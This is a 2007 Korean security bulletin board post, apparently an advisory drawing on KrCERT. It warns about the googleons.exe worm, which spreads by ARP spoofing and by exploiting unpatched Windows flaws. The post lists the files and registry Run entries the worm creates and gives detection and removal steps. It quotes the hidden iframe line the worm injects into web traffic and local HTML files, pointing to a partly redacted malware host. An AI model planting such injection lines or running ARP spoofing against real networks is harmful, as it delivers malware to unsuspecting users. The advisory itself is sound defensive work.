### CyBoard ###

글쓴이

정광천

조회수

3399

이메일

작성일

2007-09-13 13:59:52

제목

ARP Spoofing 공격 악성코드 주의

□ 개요

o 최근 국내에서 ARP Spoofing을 통해 감염되고, 감염 시 네트워크를 마비 시키는 악성코드가
등장하여 주의가 필요함
o 특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를 주기적으로 탐지하고
공격 근원지를 파악하여 관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함

□ 전파방법

o 최초 googleons.exe에 감염된 PC는 ARP Spoofing 공격
     - 해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로 ARP Reply를
        지속적으로 보냄
     - 게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를 지속적으로
        보냄

o 감염된 PC와 동일 네트워크에 연결되어 있는 호스트들은 감염된 PC를 게이트웨이로 인식하게
     하여 모든 패킷을 모니터링 및 변조 할 수 있음
     - ARP Spoofing공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고 아래와 같은
        정보를 삽입해 악성코드 유포지 사이트로 유도

"<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>"

o 악성코드 유포지 down.online[생략].net으로 유도된 PC중 아래와 같은 윈도우 취약점 패치가
안된 사이트는 googleons.exe에 감염됨

     - MS05-025
     - MS06-014
     - MS07-017
     - MS07-027

□ 악성행위 (googleons.exe)

o 감염 PC와 동일 네트워크 대역 ARP Spoofing 공격

o 동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조
"<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>" 삽입

o USB를 통한 악성코드 전파

o 감염 PC에 존재하는 .html, tml, asp, php, jsp 확장자에 아래와 같은 악성코드 삽입
- "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe>"

o 감염시 생성되는 파일
     - C:\Document and Settings\[계정]\Local Settings\Temp\
         autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)
         googleons.exe
         disocoo.exe (실행뒤 삭제)
         npptools.dll
         Packet.dll
         WanPacket.dll
         yahoons.exe (실행뒤 삭제)
     - C:\windows\system32\ (yahoons.exe 실행에 의해 생성되는 파일들)
         dllhost32.exe
         mh104.dll
         moyu103.dll
         mosou.exe
         mydata.exe
         nwizwmgjs.exe
         nwizwmgjs.dll
         nwizzhuxians.exe
         nwizzhuxians.dll
         RAV00xx.exe등 다수

o 부팅 후 재시작 할 수 있는 레지스트리에 등록
     - HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
     - 이름 : svc
     - 파일 이름 : googleons.exe

□ 감염여부 확인 및 치료방법

o 감염여부 확인
     - L3 또는 라우터에서 감염 PC 확인
        중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인)
       ※ krcert 홈페이지->기술문서->ARP Spoofing 공격 및 대책 참고

     - ARP Spoofing 피해 PC에서 공격 PC 확인
        전체 네트워크 Ping 스캔
        중복 MAC 주소 IP 확인

※ krcert 홈페이지->기술문서->ARP Spoofing 공격 및 대책 참고

     - 악성코드 감염 및 ARP Spoofing 공격 PC 확인
        C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe 존재여부 확인
        googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]

o 치료방법
- C:\Document and Settings\[계정]\Local Settings\Temp\ 하위 악성코드들 삭제

- 윈도우 시스템 폴더에 존재하는 악성코드들 삭제

- googleons.exe 프로세스 끝내기
"Ctrl" + "Alt" + "Del" 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료

     - 레지스트리 삭제
        googleons 재시작 레지스트리 삭제
        시작 → 실행 선택,   "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제
        HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

     . 기타 악성코드 레지스트리 삭제
       시작 → 실행 선택,   "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

□ 예방 방법

o 감염을 위한 사전 예방 방법
- 윈도 OS 최신 패치 실시

IP Address : 210.118.178.153